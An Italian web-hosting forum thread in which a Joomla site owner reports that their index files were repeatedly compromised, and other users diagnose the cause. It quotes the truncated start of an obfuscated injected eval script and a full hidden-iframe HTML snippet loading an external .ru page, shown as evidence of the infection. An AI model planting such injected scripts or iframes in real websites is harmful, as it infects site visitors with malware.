Visualizzazione risultati 1 fino 7 di 7

Discussione: index.php di nuovo alterato

  1. #1
    Guest

    Predefinito index.php di nuovo alterato

    Segnalo che per la seconda volta nel giro di un mese il sito che gestisco ha avuto problemi dovuti all'alterazione dei file index.php e index.htm presenti nell'intera struttura del sito.

    le modifiche risultano effettuate tutte allo stesso orario... questa volta ha comportato l'aggiunta del seguente script nel file pmweb.altervista.org/jom/index.php:

    <script>eval(function(p,a,c,k,e,d){e=function(c){r eturn(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return........

    ecc. ecc...

    Questa volta il file alterato era uno solo ed ho risolto rapidamente... la volta precedente erano una ventina (tutti gli index.php e gli index.htm), ma Altervista non dovrebbe provvedere a proteggere i file presenti sui suoi server da queste alterazioni?

    il sito è su http://pmweb.altervista.org/jom/index.php

  2. #2
    L'avatar di saitfainder
    saitfainder non è connesso Sëniör Stäff
    Data registrazione
    06-12-2002
    Residenza
    Torino
    Messaggi
    8,715

    Predefinito

    Controlla bene alla ricerca di virus e malware il PC tuo e di chiunque abbia eventualmente l'accesso al sito. A volte i problemi possono arrivare da dove non ti aspetti.


    «È una mia peculiarità distorcere la verità e inventarne di nuove.»
    «I tuoi orientamenti hanno su di me un effetto prossimo allo zero.»


  3. #3
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Assicurati inoltre di avere l'ultima versione di joomla e di eventuali moduli.
    PS: dentro l'index.html della directory logs c'è un iframe nascosto.
    Codice HTML:
    <html><body bgcolor="#FFFFFF"><Frameset rows=',100%'> <frame src='nash_script.php'><frame src="http://eivom3d.ru/flash/index.php"></frameset></body></html>
    Ultima modifica di darkwolf : 25-03-2010 alle ore 16.49.19

  4. #4
    Guest

    Predefinito

    joomla è 1.5.15.. tutte le password per l'amministrazione del sito le ho solo io..e le cambio spesso... c'è qualcosa che non va su altervista perchè i file vengono tutti alterati nello stesso istante...

  5. #5
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,760

    Predefinito

    Citazione Originalmente inviato da saitfainder Visualizza messaggio
    Controlla bene alla ricerca di virus e malware
    l'hai fatto?

  6. #6
    L'avatar di saitfainder
    saitfainder non è connesso Sëniör Stäff
    Data registrazione
    06-12-2002
    Residenza
    Torino
    Messaggi
    8,715

    Predefinito

    Citazione Originalmente inviato da pmweb Visualizza messaggio
    c'è qualcosa che non va su altervista perchè i file vengono tutti alterati nello stesso istante...
    Potrebbe anche essere, ma in quel caso il tuo non sarebbe un caso isolato.


    «È una mia peculiarità distorcere la verità e inventarne di nuove.»
    «I tuoi orientamenti hanno su di me un effetto prossimo allo zero.»


  7. #7
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Citazione Originalmente inviato da pmweb Visualizza messaggio
    joomla è 1.5.15.. tutte le password per l'amministrazione del sito le ho solo io..e le cambio spesso... c'è qualcosa che non va su altervista perchè i file vengono tutti alterati nello stesso istante...
    Se così fosse non saresti l'unico ad avere simili problemi.
    C'è qualcosa che non va sul tuo pc (un malware che cattura la password ftp e quindi la usa per infettare il sito) o un bug sullo script (non è la prima volta che utenti joomla accusano simili problemi) e/o di qualche suo modulo/plugin.
    Per iniziare potresti provare a controllare per bene il tuo pc; cambiare la password e ripulire eventuali infezioni (come quella da me precedentemente indicata) del sito.
    -
    Data "l'infezione" potrebbe anche essere stata caricata un shell.
    Ultima modifica di darkwolf : 25-03-2010 alle ore 16.57.51

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •